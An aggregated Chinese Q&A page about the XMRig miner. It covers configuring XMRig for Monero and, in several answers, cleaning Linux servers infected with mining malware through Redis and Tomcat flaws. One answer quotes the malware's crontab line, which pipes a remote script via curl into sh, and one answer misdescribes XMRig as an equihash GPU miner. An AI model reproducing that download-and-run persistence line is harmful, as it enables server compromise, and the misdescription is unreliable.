当前位置:首页 » 挖矿知识 » 服务器上启动xmrig挖矿

服务器上启动xmrig挖矿

发布时间: 2022-08-06 15:20:33

A. xmrigminer是什么程序

是一款用于AMD/Nvidia显卡的高性能equihash挖矿软件。
可以通过进入运行自定义设置内容就可以进行挖矿。

B. xmrig.exe 是什么进程

可以启动任务管理器,在进程里的这个进程上,右键,打开文件位置,看是在哪个文件夹下,应该能大致知道是什么软件的进程

C. 使用XMRig CPU i5-9400F挖矿安全吗,同时显卡2060也在挖矿,有什么需要注意的地方,多谢了。

挖矿没有什么安全不安全的。就是防静电,放电压波动过载,出于保险需要装一台不间断UPS稳压电源。

D. linux被挖矿重装系统能清除吗

可以的
xmrig是一种挖矿病毒,通常会抢占服务器的资源,导致服务器超负荷运转,出现服务宕机的情况。

E. 如何用Linux服务器挖矿教程

今天早上起来一看,服务器脚本一个都没有启动!甚是奇怪,远程登录服务器,也是异常的卡,直到最后卡死,只好重新启动服务器!
启动之后没一会又会变卡,越来越卡,top查看进程!不觉又奇怪的进程,因为平常也不经常看!所以自己也搞不明白怎么回事儿!只好到群里问了问,说是被挖矿的挂了木马文件了,是由于redis的漏洞!
后来我自己发现,原来redis远程可以直接登录,原以为redis和mysql不开放登录权限就不会支持远程登录呢,看来是我想多了
看了好长时间才发现一个异常的进程,自启的进程 molibe !
找到进程位置 ps -ef|grep molibe ;
在tmp目录下,打开一看的确是有
chmod -x molibe 取消执行权限在来到/var/spool/cron下,cat root 查看定时器的执行发现之前脚本都被改了,顾不得删除cron,service crond restart 重新启动,再有就时kill 掉molibe进程
这样大概整个就结束了!但是根本是因为redis漏洞,所以还是补上吧
首先修改redis'端口,找到redis.conf文件 port **** 修改端口号再有就是必须修改密码 # requirepass ******** 去除#号重新启动 /redis/src/redis-server /redis/redis-conf
启动成功之后
redis/redis-cli -p ****(端口) -a *****(密码)

F. xml币怎么挖

具体步骤如下:
门罗币xmr挖矿需要准备两个软件:一个是门罗币钱包,第二个是门罗币挖矿程序。
门罗币钱包很简单,一般只要下载带图形界面的钱包即可。
主要介绍门罗币的最新挖矿程序的使用。
门罗币挖矿程序使用最多的是一块开源软件叫xmrig 当前版本6.5.0,下面有各个操作系统的安装包,根据电脑选择macos版或者 windows选择下面对应的win64版本,解压出来有三个文件config,json是配置文件xmrig是执行程序,打开config,json找到pools修改这三项,上面的donate-level:1 的意思是你挖币的1%收入会教给xmrig这个软件的开发者,如果你不打算付这百分之一,需要修改源程序并编译,其实也不难,最后在终端输入cd到解压目录并输入./xmrig 执行这个程序就可以挖矿了。

G. 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top,查看了一会,没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句:

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下,感兴趣的可以研究下:

View Code

解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blog.jobbole.com/94518/然后就注入了病毒,下面是解决办法和清除工作:

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.

H. 如何通过云计算服务器实现比特币挖矿

  1. 各公有云厂商都明确要求不允许使用云服务器进行挖矿,否则会被封禁的;

  2. 挖矿主要使用的是GPU,目前各公有云厂商提供的GPU服务器都比较贵的,从性价比上来说不划算,还不如用专用芯片;

当然,有黑客通过漏洞入侵服务器,在上面植入挖矿程序和脚本,进行挖矿操作,但这个本身是不合法的行为。

I. 求助服务器被挖矿程序入侵,如何排查

新客户于最近向我们SINE安全公司咨询,说他的服务器经常卡的网站无法打开,远程连接

服务器的慢的要命,有时候PING值都达到300-500之间,还经常掉包,听客户这么一说,一般

会判断为受到了CC+DDOS混合流量攻击,再具体一问,说是机房那面没有受到流量攻击,这

就有点奇怪了,不是流量攻击,还导致服务器卡,网站无法打开,这是什么攻击?为了解决客

户服务器卡的问题,我们随即安排安全工程师对他的Linux服务器进行了安全检测与安全部署。

挖矿木马还设计了挖矿进程如果被客户强制停止后,会自动启动继续挖矿,达到不间断的挖矿,

仔细检查发现是通过设置了每个小时执行任务计划,远程下载shell挖矿木马,然后执行,检查

当前进程是否存在,不存在就启动挖矿木马,进行挖矿。

对客户的linux服务器进行详细了安全检测发现幸亏没有加密服务器的数据,以及感染蠕虫的病

毒,如果数据被加密那损失大了,客户是做平台的,里面的客户数据很重要,找出挖矿木马后,

客户需要知道服务器到底是如何被攻击的? 被上传挖矿木马的? 防止后期再出现这样的攻击

状况。

通过我们安全工程师的安全检测与分析,发现该服务器使用的是apache tomcat环境,平台的开

发架构是JSP+oracle数据库,apache tomcat使用的是2016年的版本,导致该apache存在严重

的远程执行命令漏洞,入侵者可以通过该漏洞直接入侵服务器,拿到服务器的管理员权限,

SINE安全工程师立即对apache 漏洞进行修复,并清除木马,至此问题得以解决,客户服务器

一切稳定运行,网站打开正常。

热点内容
中本聪最早的挖矿软件 发布:2024-11-19 11:43:43 浏览:747
每天打开币圈该做什么 发布:2024-11-19 11:34:42 浏览:393
数字货币交易所为什么都要手持 发布:2024-11-19 11:19:49 浏览:267
币圈山寨币能不能搞 发布:2024-11-19 11:17:13 浏览:215
波场TRX202011月18日 发布:2024-11-19 11:12:18 浏览:936
比特币历史价格2015年 发布:2024-11-19 10:31:57 浏览:782
比特币中国地区三大交易所地址 发布:2024-11-19 10:14:35 浏览:750
简单地说区块链是什么 发布:2024-11-19 10:02:46 浏览:892
比特币算力合约哪家好 发布:2024-11-19 09:58:41 浏览:400
区块链数字生命管理平台 发布:2024-11-19 09:52:27 浏览:591